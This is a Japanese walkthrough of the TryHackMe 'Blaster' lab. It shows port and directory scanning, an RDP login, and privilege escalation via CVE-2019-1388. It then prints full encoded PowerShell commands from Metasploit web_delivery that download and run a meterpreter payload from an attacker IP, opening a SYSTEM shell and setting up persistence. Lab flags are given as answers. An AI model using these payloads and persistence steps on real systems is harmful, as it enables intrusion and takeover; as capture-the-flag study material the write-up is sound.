【TryHackMe】Blaster：Walkthrough

概要

TryHackMe「Blaster」のWalkthroughです。

Task2

Q1.How many ports are open on our target system?

ポートスキャンを実行します。

$ nmap -Pn -T4 -sVC -A -p- 10.10.143.192 -oN nmap_result
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RETROWEB
|   NetBIOS_Domain_Name: RETROWEB
|   NetBIOS_Computer_Name: RETROWEB
|   DNS_Domain_Name: RetroWeb
|   DNS_Computer_Name: RetroWeb
|   Product_Version: 10.0.14393
|_  System_Time: 2025-01-22T13:07:57+00:00
|_ssl-date: 2025-01-22T13:08:01+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2025-01-21T13:00:38
|_Not valid after:  2025-07-23T13:00:38

ポートの稼働状況が分かりました。

A.2

Q2.what is the title of the page we discover when browsing to it?

80番ポートにアクセスします。

A.IIS Windows Server

Q3.What hidden directory do we discover?

Hint.This directory can be found on the wordlist 'directory-list-2.3-small.txt' which is located in /usr/share/wordlists/dirbuster on a default kali installation

ディレクトリスキャンをします。

$ dirsearch -u http://10.10.143.192/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
[08:11:32] 301 -  150B  - /retro  ->  http://10.10.143.192/retro/

A./retro

Q4.what potential username do we discover?

/retroへアクセスします。

A.wade

Q5.What possible password do we discover?

Hint.Check user comments on the blog

Ready Player Oneというポストのリプライで発見しました。

A.parzival

Q6.What are it's contents?

Hint.I recommend using Remmina for this. You can install this with the command 'apt install remmina'.

得られた情報でRDPに接続します。

$ xfreerdp /u:wade /p:'parzival' /v:10.10.143.192

Desktopにあるuser.txtからフラグを入手できました。

A.THM{HACK_PLAYER_ONE}

Task3

Q1.What CVE was it?

Hint.CVE-2019-1388

ヒントからCVE-2019-1388だと分かりました。

A.CVE-2019-1388

Q2.What is the name of this executable?

Hint.Setting the trash aside doesn't clean it up, you have to take it out as well.

デスクトップにあるhhupdが怪しいです。

A.hhupd

Q4.What is the output of running this?

下記リポジトリを参考に権限昇格をします。

デスクトップのhhupdを実行するとUACの表示が出るのでShow more detailsをクリックします。

表示されたShow information about the publisher's certificateをクリックします。

証明書の表示が出るのでIssued byのリンクをクリックします。

するとブラウザが開きます。

Save asで保存先を選択する画面に移行します。

上の検索バーにcmd.exeのフルパスを入力し、実行すると管理者権限でコマンドプロンプトが起動します。

whoamiでユーザーを確認します。

A.nt authority\system

Q5.What are the contents?

C:\Users\Administrator\Desktop\root.txtからフラグを入手できました。

A.THM{COIN_OPERATED_EXPLOITATION}

Task4

Q2.Which target number is PSH?

Hint.show targets

Metasploitを起動し、exploit/multi/script/web_deliveryを設定します。

msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must b
                                       e an address on the local machine or 0.0.0.0 to listen on all
                                        addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generat
                                       ed)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python

show targetsでターゲットの一覧を表示できます。

msf6 exploit(multi/script/web_delivery) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Python
    1   PHP
    2   PSH
    3   Regsvr32
    4   pubprn
    5   SyncAppvPublishingServer
    6   PSH (Binary)
    7   Linux
    8   Mac OS X

A.2

Q6.What command can we run in our meterpreter console to setup persistence which automatically starts when the system boots?

Hint.Check out this article: https://www.offensive-security.com/metasploit-unleashed/meterpreter-service/

exploit/multi/script/web_deliveryのオプションを設定し、windows/meterpreter/reverse_httpを設定します。

msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > set lhost 10.6.55.144
lhost => 10.6.55.144
msf6 exploit(multi/script/web_delivery) > set SRVPORT 1234
SRVPORT => 1234
msf6 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http

実行するとPowerShellのペイロードを出力出来ました。

msf6 exploit(multi/script/web_delivery) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started HTTP reverse handler on http://10.6.55.144:8080
[*] Using URL: http://10.6.55.144:1234/rePDDv1mRwFZS
msf6 exploit(multi/script/web_delivery) > [*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB3AGIAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAdwBiAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAdwBiAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4ANgAuADUANQAuADEANAA0ADoAMQAyADMANAAvAHIAZQBQAEQARAB2ADEAbQBSAHcARgBaAFMALwAxAEQAMwBzAHYAYgAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4ANgAuADUANQAuADEANAA0ADoAMQAyADMANAAvAHIAZQBQAEQARAB2ADEAbQBSAHcARgBaAFMAJwApACkAOwA=

PowerShellのペイロードを先ほど起動した管理者のコマンドプロンプトで実行すると、セッションを張れました。

msf6 exploit(multi/script/web_delivery) > 
[*] 10.10.238.249    web_delivery - Delivering AMSI Bypass (1381 bytes)
[*] 10.10.238.249    web_delivery - Delivering Payload (3839 bytes)
[!] http://10.6.55.144:1234 handling request from 10.10.238.249; (UUID: ia3ah4uo) Without a database connected that payload UUID tracking will not work!
[*] http://10.6.55.144:1234 handling request from 10.10.238.249; (UUID: ia3ah4uo) Staging x86 payload (177244 bytes) ...
[!] http://10.6.55.144:1234 handling request from 10.10.238.249; (UUID: ia3ah4uo) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.6.55.144:1234 -> 10.10.238.249:49746) at 2025-01-22 09:14:47 -0500

msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                     Information                     Connection
  --  ----  ----                     -----------                     ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ RETROWEB  10.6.55.144:1234 -> 10.10.238.2
                                                                     49:49746 (10.10.238.249)

meterpreterで接続できたのが確認できます。

msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

run persistence -Xで自動的に起動するよう設定ができます。

msf6 exploit(multi/script/web_delivery) > run persistence -X
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) > 
[*] Started HTTP reverse handler on http://10.6.55.144:1234
[*] Using URL: http://10.6.55.144:8080/7TqzY2DOx
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABjAG8AbQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsAJABjAG8AbQAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAkAGMAbwBtAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4ANgAuADUANQAuADEANAA0ADoAOAAwADgAMAAvADcAVABxAHoAWQAyAEQATwB4AC8ANgBwAHAAMABYAE4AZgBRAE4AZQB2AGwAdQBQACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgA2AC4ANQA1AC4AMQA0ADQAOgA4ADAAOAAwAC8ANwBUAHEAegBZADIARABPAHgAJwApACkAOwA=

A.run persistence -X